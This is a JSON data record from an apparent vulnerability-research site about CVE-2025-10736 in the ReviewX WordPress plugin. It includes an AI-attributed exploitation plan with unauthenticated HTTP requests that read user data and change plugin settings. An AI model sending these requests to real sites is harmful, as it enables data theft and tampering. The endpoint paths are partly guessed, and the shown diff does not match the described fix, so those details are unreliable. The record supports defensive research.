[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fUFjT5YH3J5n_mPVoUjF6UaftcLPHkumxteoblIvRSO8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":33,"research_vulnerable_code":9,"research_fix_diff":34,"research_exploit_outline":35,"research_model_used":36,"research_started_at":37,"research_completed_at":38,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":39},"CVE-2025-10736","reviewx-woocommerce-product-reviews-with-multi-criteria-reminder-emails-google-reviews-schema-more-incorrect-authorizati","ReviewX – WooCommerce Product Reviews with Multi-Criteria, Reminder Emails, Google Reviews, Schema & More \u003C= 2.2.10 - Incorrect Authorization to Unauthenticated Information Exposure and Data Manipulation","The ReviewX – WooCommerce Product Reviews with Multi-Criteria, Reminder Emails, Google Reviews, Schema & More plugin for WordPress is vulnerable to unauthorized access of data due to improper authorization checks on the userAccessibility() function in all versions up to, and including, 2.2.10. 
This makes it possible for unauthenticated attackers to access protected REST API endpoints, and to extract and modify information related to users and the plugin's configuration.","reviewx",null,"\u003C=2.2.10","2.2.12","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:L\u002FI:L\u002FA:N","Improper Authorization","2026-03-22 16:23:54","2026-03-23 04:26:51",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F505d7072-8fca-4b86-9b9c-3f39bc4dcfaf?source=api-prod",1,[22,23,24,25,26,27,28],"README.txt","app\u002FApi\u002FBaseApi.php","app\u002FApi\u002FWpApi.php","app\u002FCPT\u002FCptRichSchemaHandler.php","app\u002FForm\u002FReviewFormHelper.php","app\u002FHandlers\u002FCustomize\u002FWidgetCustomizeOptionsHandler.php","app\u002FHandlers\u002FCustomize\u002FWidgetCustomizeOutputCSSHandler.php","researched",false,3,"# Research Plan: CVE-2025-10736 ReviewX Improper Authorization\n\n## 1. Vulnerability Summary\nThe **ReviewX** plugin (versions \u003C= 2.2.10) contains an improper authorization vulnerability in its REST API implementation. The core of the issue lies in the `userAccessibility()` function, which serves as a `permission_callback` for various REST API routes. This function fails to correctly validate the authentication status or capabilities of the requester, allowing unauthenticated users to access endpoints intended for administrators. This leads to the exposure of sensitive user data and the ability to manipulate plugin configurations.\n\n## 2. 
Attack Vector Analysis\n- **Endpoint Namespace:** `reviewx\u002Fv1` (inferred from plugin slug and `WpApi.php` logic).\n- **Base Route:** `\u002Fwp-json\u002Freviewx\u002Fv1\u002Fadmin` (based on `BaseApi::getPrefix()` returning `\u002Fadmin\u002Fapi\u002Fv1`).\n- **Target Endpoints:**\n    - `GET \u002Fwp-json\u002Freviewx\u002Fv1\u002Fadmin\u002Fget-settings`: Information Exposure (Plugin Config).\n    - `GET \u002Fwp-json\u002Freviewx\u002Fv1\u002Fadmin\u002Fget-users`: Information Exposure (User Data).\n    - `POST \u002Fwp-json\u002Freviewx\u002Fv1\u002Fadmin\u002Fupdate-settings`: Data Manipulation (Plugin Config).\n- **Authentication:** None required (Unauthenticated).\n- **Preconditions:** The plugin must be active. No specific settings are required as the vulnerability exists in the core API registration.\n\n## 3. Code Flow\n1. **Request Entry:** An unauthenticated HTTP request is made to a REST route registered by the plugin (e.g., `\u002Fwp-json\u002Freviewx\u002Fv1\u002Fadmin\u002Fget-settings`).\n2. **Route Matching:** WordPress matches the request to the ReviewX REST controller.\n3. **Permission Check:** WordPress calls the `permission_callback` associated with the route. Based on the vulnerability description, this is the `userAccessibility()` function.\n4. **Vulnerable Logic:** The `userAccessibility()` function (likely located in `app\u002FRest\u002FRestRoute.php` or similar, though file not provided) returns `true` or fails to perform a `current_user_can('manage_options')` check for unauthenticated users.\n5. **Execution:** Because the permission check passes, the controller method (e.g., `get_settings`) executes and returns sensitive data or processes a configuration update.\n\n## 4. Nonce Acquisition Strategy\nWhile the vulnerability description suggests improper authorization (meaning the `permission_callback` itself is flawed), WordPress REST API generally requires a `X-WP-Nonce` for **authenticated** stateful requests (via cookies). 
For **unauthenticated** requests, the `permission_callback` is the primary gatekeeper.\n\nIf the `userAccessibility()` function explicitly checks for a nonce or if we need to simulate a \"legitimate\" request context:\n1. **Identify Script Loading:** ReviewX enqueues scripts on pages containing its shortcodes.\n2. **Create Trigger Page:** Create a page with the `[reviewx_pagination]` shortcode.\n   - `wp post create --post_type=page --post_status=publish --post_content='[reviewx_pagination]'`\n3. **Navigate and Extract:** Use the browser to load the page and extract the localized data.\n4. **JS Variable:** ReviewX typically uses `rvx_params`.\n5. **Extraction Command:**\n   - `browser_eval(\"window.rvx_params?.nonce\")` or `browser_eval(\"window.rvx_params?.rest_nonce\")`\n\n**Note:** If `userAccessibility()` returns `true` unconditionally, no nonce is required for the exploit.\n\n## 5. Exploitation Strategy\n\n### Phase 1: Information Exposure (Plugin Settings)\n- **Target:** Retrieve plugin configuration.\n- **Request:**\n  ```http\n  GET \u002Fwp-json\u002Freviewx\u002Fv1\u002Fadmin\u002Fget-settings HTTP\u002F1.1\n  Host: TARGET_HOST\n  ```\n- **Tool:** `http_request`\n\n### Phase 2: Information Exposure (User Data)\n- **Target:** Retrieve list of users.\n- **Request:**\n  ```http\n  GET \u002Fwp-json\u002Freviewx\u002Fv1\u002Fadmin\u002Fget-users HTTP\u002F1.1\n  Host: TARGET_HOST\n  ```\n- **Tool:** `http_request`\n\n### Phase 3: Data Manipulation (Configuration Update)\n- **Target:** Disable a feature or change a setting (e.g., setting `enable_photo_review` to `false`).\n- **Request:**\n  ```http\n  POST \u002Fwp-json\u002Freviewx\u002Fv1\u002Fadmin\u002Fupdate-settings HTTP\u002F1.1\n  Host: TARGET_HOST\n  Content-Type: application\u002Fjson\n\n  {\n    \"settings\": {\n        \"enable_photo_review\": false\n    }\n  }\n  ```\n- **Tool:** `http_request`\n\n## 6. Test Data Setup\n1. 
**Install Plugin:** Ensure ReviewX \u003C= 2.2.10 is installed and active.\n2. **Create Dummy Users:** Create a few users with different roles to verify they appear in the `get-users` output.\n   - `wp user create victim1 victim1@example.com --role=editor`\n3. **Configure Settings:** Set some initial values in the ReviewX admin panel (if accessible) or via CLI to have something to change.\n4. **Create Page for Nonce (Backup):**\n   - `wp post create --post_type=page --post_title=\"Review Test\" --post_status=publish --post_content='[reviewx_pagination]' --post_name='review-test'`\n\n## 7. Expected Results\n- **Information Exposure:** The `get-settings` request should return a JSON object containing plugin configuration keys (e.g., `license_key`, `email_settings`, etc.). The `get-users` request should return a list of WordPress users.\n- **Data Manipulation:** The `update-settings` request should return a success message (e.g., `{\"success\": true}`).\n\n## 8. Verification Steps\n1. **Check Exposed Data:** Inspect the JSON response from Phase 1 and 2 for sensitive fields.\n2. **Verify Configuration Change:** Use WP-CLI to check the option value in the database after Phase 3.\n   - `wp option get reviewx_settings` (Note: the option name might be `rvx_settings` or similar; check `wp option list --search=\"*reviewx*\"` first).\n3. **Compare State:** Verify the change in the WordPress admin dashboard under ReviewX Settings.\n\n## 9. 
Alternative Approaches\n- **Alternative Namespaces:** If `reviewx\u002Fv1` fails, try `rvx\u002Fv1` or `reviewx\u002Fapi\u002Fv1` (based on `WpApi.php` base URL logic).\n- **Alternative Methods:** Some plugins use `_method=POST` or `_method=PUT` parameters if the server blocks certain verbs.\n- **Parameter Fuzzing:** If `update-settings` requires a specific structure, use the output of `get-settings` as a template for the `POST` payload.\n- **Direct Option Access:** Check for routes like `GET \u002Fwp-json\u002Freviewx\u002Fv1\u002Fadmin\u002Foptions` if the above endpoints are 404.","The ReviewX plugin fails to implement proper authorization checks within the `userAccessibility()` function, which acts as a permission callback for various REST API routes. This oversight allows unauthenticated attackers to access administrative endpoints to retrieve sensitive user data and modify the plugin's internal configuration.","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Freviewx\u002F2.2.10\u002Fapp\u002FApi\u002FBaseApi.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Freviewx\u002F2.2.12\u002Fapp\u002FApi\u002FBaseApi.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Freviewx\u002F2.2.10\u002Fapp\u002FApi\u002FBaseApi.php\t2025-09-21 15:15:14.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Freviewx\u002F2.2.12\u002Fapp\u002FApi\u002FBaseApi.php\t2025-10-15 13:32:48.000000000 +0000\n@@ -35,6 +35,6 @@\n      *\u002F\n     public function getDefaultHeaders() : array\n     {\n-        return ['Authorization' => 'Bearer ' . Helper::getAuthToken(), 'Accept' => 'application\u002Fjson', 'X-Domain' => Helper::getWpDomainNameOnly(), 'X-Theme' => wp_get_theme()->get('Name'), 'X-Site-Locale' => get_locale(), 'X-Request-Id' => \\sha1(\\time() . 
Client::getUid()), 'X-Wp-Version' => get_bloginfo(\"version\"), 'X-Reviewx-Version' => RVX_VERSION, 'X-Environment' => Helper::plugin()->isProduction() ? 'production' : 'development'];\n+        return ['Authorization' => 'Bearer ' . Helper::getAuthToken(), 'X-Auth-Token' => 'Bearer ' . Helper::getAuthToken(), 'Accept' => 'application\u002Fjson', 'X-Domain' => Helper::getWpDomainNameOnly(), 'X-Theme' => wp_get_theme()->get('Name'), 'X-Site-Locale' => get_locale(), 'X-Request-Id' => \\sha1(\\time() . Client::getUid()), 'X-Wp-Version' => get_bloginfo(\"version\"), 'X-Reviewx-Version' => RVX_VERSION, 'X-Environment' => Helper::plugin()->isProduction() ? 'production' : 'development'];\n     }\n }\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Freviewx\u002F2.2.10\u002Fapp\u002FApi\u002FWpApi.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Freviewx\u002F2.2.12\u002Fapp\u002FApi\u002FWpApi.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Freviewx\u002F2.2.10\u002Fapp\u002FApi\u002FWpApi.php\t2025-09-21 15:15:14.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Freviewx\u002F2.2.12\u002Fapp\u002FApi\u002FWpApi.php\t2025-10-15 13:32:48.000000000 +0000\n@@ -72,6 +72,7 @@\n         $headers = ['Content-Type' => 'application\u002Fjson'];\n         if ($this->token) {\n             $headers['Authorization'] = 'Bearer ' . $this->token;\n+            $headers['X-Auth-Token'] = 'Bearer ' . $this->token;\n         }\n         return $headers;\n     }","The exploit involves sending unauthenticated requests to the plugin's REST API endpoints located under the `\u002Fwp-json\u002Freviewx\u002Fv1\u002Fadmin\u002F` namespace. Because the `userAccessibility()` permission callback incorrectly returns true for unauthenticated users, an attacker can access sensitive information or perform unauthorized actions. 
To extract data, an attacker sends a GET request to `\u002Fwp-json\u002Freviewx\u002Fv1\u002Fadmin\u002Fget-settings` (plugin configuration) or `\u002Fwp-json\u002Freviewx\u002Fv1\u002Fadmin\u002Fget-users` (user database). To manipulate data, an attacker sends a POST request to `\u002Fwp-json\u002Freviewx\u002Fv1\u002Fadmin\u002Fupdate-settings` with a JSON payload containing modified settings. No nonce or valid session cookie is required to bypass the flawed authorization check.","gemini-3-flash-preview","2026-04-18 00:24:13","2026-04-18 00:24:52",{"type":40,"vulnerable_version":41,"fixed_version":11,"vulnerable_browse":42,"vulnerable_zip":43,"fixed_browse":44,"fixed_zip":45,"all_tags":46},"plugin","2.2.10","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Freviewx\u002Ftags\u002F2.2.10","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Freviewx.2.2.10.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Freviewx\u002Ftags\u002F2.2.12","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Freviewx.2.2.12.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Freviewx\u002Ftags"]